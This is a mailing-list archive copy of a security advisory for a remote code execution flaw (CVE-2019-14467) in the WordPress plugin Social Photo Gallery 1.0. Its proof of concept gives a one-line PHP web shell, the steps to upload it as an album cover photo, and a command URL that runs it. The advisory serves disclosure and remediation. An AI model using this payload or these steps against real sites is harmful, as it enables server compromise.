| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <e198c2c7-2827-ce2d-4b8f-6e8efd8f1039@prestigiaonline.com> Date: Wed, 13 Nov 2019 08:00:37 +0000 From: Prestigia <info@...stigiaonline.com> To: fulldisclosure@...lists.org, dm@...urityfocus.com, submit@...sec.com Subject: [FD] WordPress Plugin Social Photo Gallery 1.0 - Remote Code Execution ============================================= PRESTIGIA SEGURIDAD ALERT 2019-001 - Original release date: July 31, 2019 - Last revised: November 13, 2019 - Discovered by: Prestigia Seguridad - Severity: 7,5/10 (CVSS Base Score) - CVE-ID: CVE-2019-14467 ============================================= I. VULNERABILITY ------------------------- WordPress Plugin Social Photo Gallery 1.0 - Remote Code Execution II. BACKGROUND ------------------------- Social Gallery is the ultimate lightbox plugin for WordPress. Your images deserve to be experienced and shared, to spark a response as they travel the social web, and to work for you by generating more fans and more Likes for your content. III. DESCRIPTION ------------------------- The version of WordPress Plugin Social Photo Gallery is affected by a Remote Code Execution vulnerability. The application does not check the extension when a imagen of a album is uploaded, resulting in a execution of php code. To exploit the vulnerability only is needed create a album in the application and attach a malicious php file in the cover photo album. IV. PROOF OF CONCEPT ------------------------- 1. Create a .php archive (cmd.php): <?php system($_GET['cmd']); ?> 2. Click Add Album, select the name, for example "demo" and in the "Cover Photo" select the cmd.php file. 3. Load the next URL and magic: http://127.0.0.1/wordpress/wp-content/uploads/socialphotogallery/demo/cmd.php?cmd=ls V. BUSINESS IMPACT ------------------------- Execute local commands in the server result from these attacks. VI. SYSTEMS AFFECTED ------------------------- WordPress Plugin Social Photo Gallery 1.0 VII. SOLUTION ------------------------- The solution is only allow upload Digital Image Files: TIFF, JPEG, GIF, PNG VIII. REFERENCES ------------------------- https://wordpress.org/plugins/social-photo-gallery/ IX. CREDITS ------------------------- This vulnerability has been discovered and reported by Prestigia Seguridad Email: info@...stigiaonline.com X. REVISION HISTORY ------------------------- July 31, 2019 1: Initial release November 13, 2019 2: Revision to send to lists XI. DISCLOSURE TIMELINE ------------------------- July 31, 2019 1: Vulnerability acquired by Prestigia Seguridad July 31, 2019 2: Email to vendor without response August 15, 2019 3: Second email to vendor without response November 13, 2019 4: Send to the Full-Disclosure lists XII. LEGAL NOTICES ------------------------- The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. XIII. ABOUT ------------------------- Prestigia Seguridad https://seguridad.prestigia.es/ _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists